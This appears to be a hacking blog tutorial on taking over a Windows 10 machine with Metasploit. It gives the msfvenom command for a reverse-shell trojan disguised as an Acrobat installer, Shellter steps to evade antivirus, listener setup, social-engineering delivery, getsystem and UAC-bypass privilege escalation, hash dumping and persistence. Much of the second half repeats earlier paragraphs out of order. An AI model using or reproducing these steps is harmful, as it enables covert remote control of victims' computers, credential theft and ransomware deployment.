Hacking into Windows 10 Using Metasploit Framework
Hackers always seeking zero-day exploits that can successfully bypass Windows 10’s security features. There has been extensive research into creating undetectable malware and entire GitHub projects dedicated to automating the creation of undetectable payloads such as WinPaylods, Veil v3, and TheFatRat.
A trojan or a backdoor can give access to target box remotely. Here we going to use reverse_tcp module. This is a specially crafted malware that establish a remote connection to the hacker’s machine over Transition Control Protocol from the victim machine. This allows the hacker to breach into the machine and take full control over it.
Metasploit framework is one of the best tool that I love in Kali Linux. It has both handler and payload generator. Once the payload gets executed on the target machine while then we are on listening mode in the handler section it spawns a meterpreter shell. This meterpreter shell allow us to communicate with the target system and execute shell commands. Compared to normal shell meterpreter has plenty of options. This can be done while the target is on the same LAN network or over the internet, there is no difference you just have to configure the router and payload accordingly. This process is dead simple. Follow the steps.
The Metasploit Framework is the most commonly-used framework for hackers worldwide. It allows hackers to set up listeners that create a conductive environment (referred to as a Meterpreter) to manipulate compromised machines. We shall do this through a malicious executable file using Shellter.
THIS ARTICLE ASSUMES THE INSTALLATION OF KALI LINUX HAS BEEN DONE AND IS REACHABLE THROUGH A BRIDGED CONNECTION FROM A WINDOWS MACHINE ON VMWARE.
Generating a Malicious .exe file
Generate the payload using msfvenom, set the port to 4444 and IP to your public IP or local IP depending on your target. The generated Trojan will try to connect to this IP and port when its executed. following command will generate the Trojan in .exe format.
To obtain our IP address we use the ifconfig command within Kali, specifying the interface as eth0 (since we are on Ethernet) as shown below.
ifconfig
A Trojan will be generated in the desktop. keep it aside and move on to handler section. you would use msfvenom as shown in the command below:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.11.118 LPORT=4444 -o /root/acrobatreaderpro.exe
The command above instructs msfvenom to generate a 32-bit Windows executable file that implements a reverse TCP connection for the payload. The format must be specified as being type .exe, and the local host (LHOST) and local port (LPORT) have to be defined. In our case, the LHOST is the IP address of our attacking Kali Linux machine, and the LPORT is the port to listen on for a connection from the target once it has been compromised.
Antivirus solutions work by detecting malicious signatures within executable. Our file will thus be flagged as malicious once within the Windows environment. We therefore have to figure out a way to modify it to bypass antivirus detection. We will encode it to make it fully undetectable, or FUD.
Making the Executable FUD (Fully Undetectable)
To encode our executable, we shall be using Shellter. Shellter works by changing the executable’s signatures from the obviously malicious one to a completely new and unique one that can bypass detection.
Use the below code to install and run Shellter.
sudo apt-get install shellter
To launch Shellter just type Shellter on the terminal.
You will be required to enter the absolute path to the executable to make FUD. Make sure to select “Auto” mode as shown below.
Shellter will then initialize and run some checks. It will then prompt you whether to run in stealth mode. Select “Y” for yes.
The next prompt will require you to enter the payload, either a custom or a listed one. You should select a listed one by typing “L”, unless you want to proceed with your own custom payload. Select the index position of the payload to use. We need a Meterpreter_Reverse_TCP, so we will have to go with “1.”
Enter LHOST and LPORT and press Enter. Shellter will run to completion and request you to press Enter.
At this point, the executable you provided will have been made undetectable to antivirus programs.
We now need to set up a listener on the port we determined within the executable. We do this by launching Metasploit using the command msfconsole on the Kali Linux terminal.
The screenshot below shows what commands to issue within Metasploit.
First, we’ll tell Metasploit to use the generic payload handler “multi/handler” using the command use multi/handler.
We will then set the payload to match the one set within the executable using the command set payload windows/meterpreter/reverse_tcp. We will then set the LHOST and LPORT this way — set LHOST 192.168.11.118 and set LPORT 4444. Once done, type “run” or “exploit” and press Enter.
The screenshot below displays the output. The reverse TCP handler should begin waiting for a connection.
The next step is to execute it from a Windows perspective. In a real-world practical situation, this will require social engineering skills. Nevertheless, I uploaded to drive and copy the acrobatreaderpro.exe to a Windows system within the same network as the Kali system.
Executing the Payload
Execute the payload from the target machine. The executable causes the payload to be executed and connect back to the attacking machine (Kali Linux). Immediately, we receive a Meterpreter session on our Kali Linux:
Privilege Escalation
Privilege escalation allows us to elevate privileges from our less privileged user to a more privileged one, preferably the SYSTEM user, which has all administrative rights.
On the Meterpreter prompt we use the getsystem command, as shown below:
With these privileges, we can do quite a lot on our compromised target. For instance, we can list the active processes, access to system folders and dump the passwords or hashes. Make directory and upload malware or ransomware program or other payload.
Now that we are within the target machine, why not perform some persistence to remain within?
Persistence
Persistence allows us to gain access back to the machine whenever we need to even when the target decides to patch the vulnerability.
There are many ways of performing persistence. For example, we can code a malicious virus to always connect back to us whenever the target turns on their machine (this is called a backdoor), or even have our own user accounts within the compromised target machine. Metasploit also provides its method of persistence.
If the methods used by getsystem all fail, we need an alternative method of elevating privileges. We will use the comhijack exploit module that is used to bypass User Access Control. To do so, we “background” our Meterpreter session, switch our exploit from multi/handler to windows/local/bypassuac_comhijack and implement this on the session in the background using set SESSION 2.
We then set the payload using set payload windows/x64/meterpreter/reverse_tcp and set the LPORT and LHOST. We then run the exploit.
In our case we already gained an access to the target box, we got the failed message. In your case you receive a Meterpreter session response. Typing sysinfo may show the information of your target. getuid shows that you are running as user on Windows 10, but you can elevate to SYSTEM by issuing getsystem. You can see that elevation was successful and you can confirm this by issuing getuid again, you can see NT AUTHORITY\SYSTEM.
You can list the process of the target box, browse through the system folders, make directory and upload Trojan.
Conclusion
Hackers are not limited in what they can use the framework for. For instance, it can also be used to perform information gathering and pivoting through compromised networks. Since our whole objective here was to create an undetectable payload, antivirus software is not really a good option for protecting against these types of file extension spoofing attacks.
One thing you can do is just put on your magnifying glass when looking at files you download off the internet. In this article we have seen how the Metasploit Framework can be used to compromise a Windows 10 machine to gain a Meterpreter session. We have used Shellter to FUD our malicious executable to bypass the Windows 10 antivirus and performed privilege escalation to gain more rights on our compromised machine.
A Trojan will be generated in the desktop. keep it aside and move on to handler section. you would use msfvenom as shown in the command below:
Antivirus solutions work by detecting malicious signatures within executable. Our file will thus be flagged as malicious once within the Windows environment. We therefore have to figure out a way to modify it to bypass antivirus detection. We will encode it to make it fully undetectable, or FUD.
Shellter will then initialize and run some checks. It will then prompt you whether to run in stealth mode. Select “Y” for yes.
The next prompt will require you to enter the payload, either a custom or a listed one. You should select a listed one by typing “L”, unless you want to proceed with your own custom payload. Select the index position of the payload to use. We need a Meterpreter_Reverse_TCP, so we will have to go with “1.”
Enter LHOST and LPORT and press Enter. Shellter will run to completion and request you to press Enter.
At this point, the executable you provided will have been made undetectable to antivirus programs.
We now need to set up a listener on the port we determined within the executable. We do this by launching Metasploit using the command msfconsole on the Kali Linux terminal.
The screenshot below shows what commands to issue within Metasploit.
First, we’ll tell Metasploit to use the generic payload handler “multi/handler” using the command use multi/handler.
We will then set the payload to match the one set within the executable using the command set payload windows/meterpreter/reverse_tcp. We will then set the LHOST and LPORT this way — set LHOST 192.168.11.118 and set LPORT 4444. Once done, type “run” or “exploit” and press Enter.
The screenshot below displays the output. The reverse TCP handler should begin waiting for a connection.
The next step is to execute it from a Windows perspective. In a real-world practical situation, this will require social engineering skills. Nevertheless, I uploaded to drive and copy the acrobatreaderpro.exe to a Windows system within the same network as the Kali system.
Executing the Payload
With these privileges, we can do quite a lot on our compromised target. For instance, we can list the active processes, access to system folders and dump the passwords or hashes. Make directory and upload malware or ransomware program or other payload.
Now that we are within the target machine, why not perform some persistence to remain within?
We then set the payload using set payload windows/x64/meterpreter/reverse_tcp and set the LPORT and LHOST. We then run the exploit.
In our case we already gained an access to the target box, we got the failed message. In your case you receive a Meterpreter session response. Typing sysinfo may show the information of your target. getuid shows that you are running as user on Windows 10, but you can elevate to SYSTEM by issuing getsystem. You can see that elevation was successful and you can confirm this by issuing getuid again, you can see NT AUTHORITY\SYSTEM.
You can list the process of the target box, browse through the system folders, make directory and upload Trojan.
No comments:
Post a Comment